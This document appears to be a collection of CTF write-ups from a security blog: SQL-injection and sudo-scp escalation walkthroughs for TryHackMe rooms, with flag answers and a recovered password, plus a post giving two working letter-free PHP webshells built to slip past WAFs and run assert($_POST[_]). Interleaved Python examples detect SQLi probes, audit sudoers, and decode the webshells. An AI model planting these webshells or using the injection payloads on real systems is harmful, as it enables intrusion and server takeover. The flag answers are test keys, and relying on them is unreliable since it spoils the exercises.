thm-jurassicpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let's play TryHackMe's Jurassicpark at

This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too…

You're also going to want to turn up your device's volume (Firefox is recommended). So, deploy the VM and get hacking...

Please connect to our network before deploying the machine.


#1 What is the SQL database called which is serving the shop information?
#2 How many columns does the table have?
#3 What's the system version?
ubuntu 16.04
┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
#4 What is dennis' password?
┌─[user@parrot-virtual]─[~]
└──╼ $curl http://10.10.28.121/item.php?id=5%20union%20select%201,password,3,4,5%20FROM%20users
#5 Locate and get the first flag contents.

b89f2d69c56b9981ac92dd267f

#6 What's the contents of the second flag?
96ccd6b429be8c9a4b501c7a0b117b0a
#7 What's the contents of the third flag?
b4973bbc9053807856ec815db25fb3f1
#8 There is no fourth flag.
#9 What's the contents of the fifth flag?
2a7074e491fcacc7eeba97808dc5e2ec

We will start with a version and script scan of the top ports on the target:

We have an SSH service open on port 22 and an Apache web server on port 80.

Let's navigate to the online shop:

Here we can purchase a package, I will select the bronze package:

The first thing to notice here is the address bar, which shows that this page is requested with ?id=2.

From the tags on this box we know it involves SQLi (SQL injection). I am going to cycle the ?id= value from 0 to 5 and see what other pages it brings up.

?id=0 — No results found

?id=1 — Gold package

?id=2 — Bronze package

?id=3 — Basic package

?id=4 — No results found

?id=5 — Development package (Interesting)

We have a user named Dennis. There is also a note saying that we cannot use certain characters; obviously the ' character is the one used in SQLi.

Let's try to break the SQL using ?id=5' or 1=1

So we are being blocked from using the ' character. This is why my initial attempts with SQLMap did not work. So let's try another special character that is not blocked: *.

As you can see, appending * (?id=5*) causes an SQL error, so it is fair to say that the developer has been lazy with their code and the page is vulnerable to SQLi.

Let's first find out how many columns the query returns and see if we can perform a UNION-based injection.

To do this we use an ORDER BY clause and increase the column number until we get an error: ?id=5 order by 1, 2, 3, ...

So the query has 5 columns. Knowing this, we can use UNION to retrieve information from the database, but first we need to see which of the columns are reflected on the page. That is where the UNION query comes in: ?id=5 union all select 1,2,3,...

By using 01, 02, 03, 04 and 05 as the column values I can see which ones are reflected. As some of the columns, such as price, are prefixed with a $ sign, we can use columns 2, 4 and 5 to pull information from the database. Column 1 does not appear on the website, so we cannot use that one either.

We need to find the database version, database name and we already know the number of columns.

the database name is and the version is 

To pull the tables from the database we can use the following:

?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

We can see that we have two tables and 

Let's see if we can pull the columns of the table 'users'. To do this we can use the following:

?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"

In the table ‘users’ we have the following columns – and 

Normally I would extend this further and pull all the usernames and passwords from the database; however, remember the webpage when ?id=5.

The word 'username' is blocked by the filter; however, we can at least retrieve the password. We can extract it using:

?id=5 union select 1,2,3,password,5 from users

Although we cannot retrieve the username, we can assume that it is Dennis, and the password is ih8dinos. Hopefully these are the SSH credentials for port 22.
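As an added example (not part of the original writeup), here is a small Python script that looks at this procedure from the defender's side: it parses web-server access-log lines and flags the probing sequence just walked through (a quote or * appended to id, ORDER BY column counting, UNION SELECT, information_schema lookups). The log lines, client addresses, host and thresholds are constructed for the demonstration and are not from the room.

```python
"""Spot SQL-injection probing (quote/wildcard tails, ORDER BY column counting,
UNION SELECT, information_schema enumeration) in web-server access logs.

Added example for this writeup; it is not code from the room or from the
original post. The log lines are constructed (client IPs, timestamps and the
host are made up) but mirror the requests the writeup sends to item.php.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /item.php?id=2 HTTP/1.1" 200 1831 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /item.php?id=5' HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /item.php?id=5* HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /item.php?id=5%20order%20by%206 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2020:10:00:05 +0000] "GET /item.php?id=5%20union%20select%201,version(),3,4,5 HTTP/1.1" 200 1844 "-" "curl/7.64.0"
10.0.0.5 - - [01/Jan/2020:10:00:06 +0000] "GET /item.php?id=1%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 1850 "-" "curl/7.64.0"
10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /item.php?id=3 HTTP/1.1" 200 1822 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns are matched against each URL-decoded, lower-cased parameter value.
PROBE_PATTERNS = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "order_by": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "sql_comment": re.compile(r"(--|/\*)"),
    # a bare quote or * appended to an otherwise numeric id (the writeup's first probes)
    "quote_or_wildcard_tail": re.compile(r"^\d+['\"*]$"),
}


def parse_log_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_params(target):
    """Query parameters of a request target, decoded twice so that
    double-encoded payloads (%2520 -> %20 -> space) are normalised as well."""
    query = urlsplit(target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def classify_request(target):
    """Names of the probe patterns that fire on any parameter of the request."""
    hits = set()
    for _, value in decoded_params(target):
        norm = value.lower()
        for name, pattern in PROBE_PATTERNS.items():
            if pattern.search(norm):
                hits.add(name)
    return hits


def analyze(log_text, min_distinct=2):
    """Aggregate probe hits per client IP and flag clients that either reached
    UNION/information_schema or used at least `min_distinct` probe types."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        for name in classify_request(rec["target"]):
            bucket = per_ip.setdefault(rec["ip"], {})
            bucket[name] = bucket.get(name, 0) + 1
    flagged = sorted(
        ip for ip, hits in per_ip.items()
        if "union_select" in hits or "schema_enum" in hits or len(hits) >= min_distinct
    )
    return per_ip, flagged


if __name__ == "__main__":
    per_ip, flagged = analyze(SAMPLE_LOG)
    for ip in flagged:
        print(ip, per_ip[ip])
```

The single-character probes (5' and 5*) are deliberately scored low on their own, since a stray quote in a legitimate request is common; it is the progression from those to ORDER BY and then UNION from the same client that makes the activity unambiguous.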

┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
<link rel="icon" type="image/png" href="assets/favicon.png"/>

<!DOCTYPE html>
<html lang="en">
<head>
<title>Buy, Buy, Buy</title>--snip--


<h1>5.7.25-0ubuntu0.16.04.2 Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $3</h3></br>
<div class="alert alert-primary" role="alert"><b>5</b> of these packages have been sold in the last hour.</div></br>
<h4>4</h4>
</br><h4>Order yours quick by calling us!</h4>

</div>
</body>
</html>
┌─[user@parrot-virtual]─[~]

Or we simply use sqlmap to do all the work (it takes the target URL with -u):

┌─[user@parrot-virtual]─[~]
└──╼ $sqlmap -u 'http://10.10.114.167/item.php?id=1' --batch --dump --threads 10

-> dennis / ih8dinos

We are in. Exploring Dennis's home directory, we find flag1.txt.

We can also read the .bash_history.

In the .bash_history we can see the third flag. There are also many scp commands being run through sudo. scp is a file-transfer utility that copies files between computers over SSH. We can also see that flag5 is in the /root directory.

Let's check whether Dennis has any sudo privileges:

We can see that Dennis has full root privilege to run scp, which now explains the .bash_history.

Moving back to /home to see what other users we have, there is one called ubuntu, whose directory we cd into.

One hidden file stands out: .viminfo, which belongs to root. Although it is owned by root, our sudo rights for scp let us copy it to our local machine.

You should have the SSH server already installed on Kali; however, you can check this with the following:

As I do not use SSH that much, I use ssh.socket; start the SSH server with the following:

# systemctl start ssh.socket

If you want a good guide to setting up the SSH server, check out the link below:

How to Enable and Start SSH on Kali Linux – LMG Security

www.lmgsecurity.com

Anyway, back to downloading the interesting .viminfo file to our local machine using scp.

Back on our local machine we can cat the .viminfo file, which gives us some very interesting information.

As you can see, we have the location of flagTwo, which can be found in /boot/grub/fonts.

We can cat this file and retrieve the second flag:

We know there is no flag4 and we know that flag5 is in the /root directory.

Again we can use the sudo rights for scp to transfer flag5 to our local machine.

There is another option instead of transferring the files to our local machine with scp. Basically, scp is an exploitable binary, and since sudo lets us run it as root, we can use it to escalate our privileges to root.

The go-to resource for exploitable common binaries is GTFOBins:

GTFOBins

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions…

gtfobins.github.io

A quick search on GTFOBins for scp with sudo rights gives us the following exploit:

Let's enter this as user Dennis and see what happens:

How awesome is that, a few lines of code and full root access.
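The check a defender would want for this finding, as an added example that is neither the room's nor GTFOBins' code: a Python audit of sudoers-style rules that reports which users can run a shell-capable binary (scp among them) as root, whether a password is required, and whether the arguments are pinned. The sudoers text and the SHELL_CAPABLE set are constructed for the example.

```python
"""Audit sudoers-style rules for binaries that let the invoking user run an
arbitrary program as root, the way the writeup uses sudo scp.

Added example for this writeup, not code from the room. The sudoers text is
constructed, and SHELL_CAPABLE is a small hand-picked subset (assumption: a
real audit would take the list from a maintained reference such as GTFOBins).
"""
import os
import re

SHELL_CAPABLE = {
    "scp", "vim", "vi", "less", "more", "find", "awk", "python", "python3",
    "perl", "env", "bash", "sh", "tar", "rsync",
}

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
dennis  ALL=(root) NOPASSWD: /usr/bin/scp
backup  ALL=(root) NOPASSWD: /usr/bin/rsync --dry-run /srv/backup
ubuntu  ALL=(ALL) /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

# user  hosts = (runas[:group]) [TAG:] cmd [args] [, cmd ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)


def parse_rule(line):
    """Parse one user specification; comments, Defaults and aliases return None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(
        ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
    ):
        return None
    m = RULE_RE.match(line)
    if m is None:
        return None
    commands = []
    tags = set()  # a tag such as NOPASSWD: stays in effect for the rest of the list
    for item in m.group("cmds").split(","):
        item = item.strip()
        while True:
            t = re.match(r"^([A-Z]+):\s*", item)
            if t is None:
                break
            tags.add(t.group(1))
            item = item[t.end():]
        commands.append({"cmd": item, "tags": set(tags)})
    runas = (m.group("runas") or "root").split(":", 1)[0].strip()
    return {"user": m.group("user"), "runas": runas, "commands": commands}


def find_risky(sudoers_text):
    """Rules granting root (or ALL) execution of a shell-capable binary or of ALL."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["user"] == "root" or rule["runas"] not in ("root", "ALL"):
            continue
        for c in rule["commands"]:
            words = c["cmd"].split()
            if not words:
                continue
            binary = "ALL" if words[0] == "ALL" else os.path.basename(words[0])
            if binary == "ALL" or binary in SHELL_CAPABLE:
                findings.append({
                    "user": rule["user"],
                    "binary": binary,
                    "nopasswd": "NOPASSWD" in c["tags"],
                    # sudo matches the argument list exactly, so pinned arguments
                    # narrow what the user can run (they do not make it safe)
                    "args_pinned": len(words) > 1,
                })
    return findings


if __name__ == "__main__":
    for f in find_risky(SAMPLE_SUDOERS):
        print(f)
```

On the constructed input the dennis rule is the worst case (root, no password, no argument restriction), which is exactly the shape the .bash_history on this box hinted at.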

Author : Puckiestyle

thm-avengers-nl

Avengers Blog

https://tryhackme.com/room/avengers

[subscribers only room]



#1

On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

*Use the inspect element tool by hitting F12*

#2

Look at the HTTP response headers and obtain flag 2.

*You may have to scroll all the way up to see the original “/”*

#3

Look around the FTP share and read flag 3!

*This will download the file. From there just simply view the file*

#4

What is the directory that has an Avengers login?

*There should be one that sticks out from the list below*

gobuster dir -u http://10.10.158.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s

Hint

Have the username and password as ' or 1=1-- (include the apostrophe).

You should now see the page shown above. We're going to manually exploit this page using an attack called SQL injection.

SQL Injection is a code injection technique that manipulates an SQL query. You can execute your own SQL that could destroy the database, reveal all database data (such as usernames and passwords) or trick the web server into authenticating you.

To exploit SQL, we first need to know how it works. A SQL query could be SELECT * FROM Users WHERE username = {User Input} AND password = {User Input 2}; if you insert additional SQL as the {User Input}, we can manipulate this query. For example, if I have the {User Input 2} as ' 1=1 we could trick the query into authenticating us, as the ' character would break the SQL query and 1=1 would evaluate to true.

To conclude, having our first {User Input} as the username of the account and {User Input 2} being the condition to make the query true, the final query would be:
SELECT * FROM Users WHERE username = `admin` AND password = `' 1=1`

This would authenticate us as the admin user.
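The vulnerable query beside its fix, as an added Python example that is not part of the room: the string-concatenated form accepts the ' or 1=1-- payload from the hint, the parameterized form does not. An in-memory SQLite database stands in for whatever database the site really uses (an assumption), and the Users row is constructed.

```python
"""Authentication-bypass SQL injection: the string-built query beside its
parameterized fix, run against an in-memory SQLite database.

Added example for this writeup, not code from the room. The Users table and
credentials are constructed for the demonstration.
"""
import sqlite3


def make_db():
    """Create the constructed Users table with a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the text describes: user input spliced straight into SQL,
    so a quote in the input ends the string literal and the rest becomes SQL."""
    query = (
        "SELECT username FROM Users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is always data, never SQL,
    so ' or 1=1-- is compared literally against the stored password."""
    row = conn.execute(
        "SELECT username FROM Users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, payload))  # admin
    print("safe:      ", login_safe(db, payload, payload))        # None
```

With the payload in both fields the vulnerable query becomes WHERE username = '' or 1=1--' AND ..., the comment swallows the password check and the first row (admin) comes back; the parameterized version returns nothing because no account has that literal password.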

#5

Log into the Avengers site. View the page source, how many lines of code are there?

*View the source*

#6

Read the contents of flag5.txt

*Cat will not work. So let’s try the reverse of cat, ‘tac’. This will give us our flag. Flag will be under “flag5.txt”*

Protected: htb-feline-nl

This content is password protected. To view it please enter your password below:

Posted on

bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] Php webshell without numbers and letters

To bypass a WAF, you can use several techniques to rewrite your webshell.

Idea

First, let's make the idea clear. The core idea is to take non-alphanumeric characters, transform them in various ways, and end up with any letter from a to z. Then we use PHP's ability to call a function dynamically: we splice together a function name such as "assert" and execute it through a variable function call.

So, the transformation method is the main point of this problem.

But before that, I need to talk about the difference between php5 and 7.

In PHP 5, assert is a function, so we can use $f='assert';$f(...); to dynamically execute arbitrary code.

In PHP 7, however, assert is no longer a function but a language construct (similar to eval), so it cannot be executed through a variable function name, and using it is a little more complicated. There is no need to worry too much, though: other functions, file_put_contents for example, can be used the same way to get a shell.

For convenience, PHP 5 is used as the environment here; the PHP 7 variant is left for you to explore.

Method 1

This is the easiest method to think of. In PHP, XORing two strings gives another string. So, to get a letter from a to z, we need to find two non-alphanumeric characters whose XOR result is that letter.

We get the following result:

<?php
// %XX below stands for the raw (URL-decoded) byte that is actually in the file,
// e.g. %01 is the byte 0x01, and 0x01 ^ 0x60 ('`') = 0x61 = 'a'.
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;   // variable variable: $$__ is $_POST
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

This uses a small PHP trick; look at the documentation: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl's convention when dealing with arithmetic operations on character variables and not C's. For example, in PHP and Perl $a = 'Z'; $a++; turns $a into 'AA', while in C a = 'Z'; a++; turns a into '[' (ASCII value of 'Z' is 90, ASCII value of '[' is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how do we get a variable holding the string 'a'?

Crucially, the first letter of the string Array is an uppercase A, and its fourth letter is a lowercase a. In other words, we can get both 'A' and 'a', which means that by incrementing we can reach every letter in a-z and A-Z.

In PHP, if you concatenate an array with a string, the array is converted to the string Array:

Then take the first character of that string and you have 'A'.

Using this technique, I wrote the following webshell (because PHP function names are case-insensitive, we end up calling ASSERT($_POST[_])):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

The @ character is not allowed by the filter, but it is not needed 😉: it only suppresses the array-to-string notice, and execution continues with or without it.
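As an added analysis example (not the original author's code): a Python script that statically reconstructs what both snippets build, so an analyst can read such a file without executing it. It URL-decodes the %XX bytes and XORs them for Method 1, and reimplements PHP's Perl-style string increment for Method 2. The term lists and increment counts are copied from the two snippets above; the helper names are my own.

```python
"""Statically reconstruct the strings that the two letter-free PHP snippets
build: URL-decoded byte XOR (Method 1) and Perl-style string increment
(Method 2), without running any PHP.

Added analysis example for this post, not the original author's code. The
term lists and increment counts are taken from the snippets; helper names are
assumptions of this example.
"""
from urllib.parse import unquote_to_bytes


def php_xor(a: bytes, b: bytes) -> bytes:
    """PHP's string ^ string: bytewise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def xor_term(lhs: str, rhs: str) -> str:
    """Evaluate one ('%XX' ^ '`') term. %XX is the URL-encoded form of the raw
    byte that actually sits in the uploaded file, so decode before XORing."""
    return php_xor(unquote_to_bytes(lhs), unquote_to_bytes(rhs)).decode("latin-1")


# Terms copied from Method 1.
ASSERT_TERMS = [("%01", "`"), ("%13", "`"), ("%13", "`"),
                ("%05", "`"), ("%12", "`"), ("%14", "`")]
POST_TERMS = [("%0D", "]"), ("%2F", "`"), ("%0E", "]"), ("%09", "]")]


def decode_method1(terms, prefix=""):
    """Concatenate the XOR terms, as the PHP '.' operator does."""
    return prefix + "".join(xor_term(l, r) for l, r in terms)


def php_increment(s: str) -> str:
    """PHP/Perl alphanumeric string increment: 'A'->'B', 'Z'->'AA', 'a9'->'b0'.
    Works from the right with carry; stops at the first non-alphanumeric
    character, as PHP does."""
    if not s:
        return "1"
    chars = list(s)
    i = len(chars) - 1
    while i >= 0:
        c = chars[i]
        if c == "z":
            chars[i] = "a"
        elif c == "Z":
            chars[i] = "A"
        elif c == "9":
            chars[i] = "0"
        elif c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        else:
            return "".join(chars)
        i -= 1
    # carried past the leftmost character: prepend according to its class
    first = s[0]
    prefix = "a" if first == "z" else "A" if first == "Z" else "1"
    return prefix + "".join(chars)


def decode_method2(increments, start="A"):
    """Rebuild a word from Method 2: each letter is `start` ('A', the first
    character of the string 'Array') incremented n times."""
    out = ""
    for n in increments:
        v = start
        for _ in range(n):
            v = php_increment(v)
        out += v
    return out


# Increment counts per letter, copied from the Method 2 snippet.
ASSERT_INCREMENTS = [0, 18, 18, 4, 17, 19]
POST_INCREMENTS = [15, 14, 18, 19]

if __name__ == "__main__":
    print(decode_method1(ASSERT_TERMS), decode_method1(POST_TERMS, "_"))   # assert _POST
    print(decode_method2(ASSERT_INCREMENTS), "_" + decode_method2(POST_INCREMENTS))  # ASSERT _POST
```

The same two helpers cover the general case, not just these two shells: any ('%XX' ^ 'c') chain or $x++ run in a suspicious PHP file can be fed through them to recover the function name being assembled, which is what a WAF or a file-scanning rule ultimately needs to look at rather than the literal bytes.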

Protected: htb-omni-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-laser-nl

This content is password protected. To view it please enter your password below:

Posted on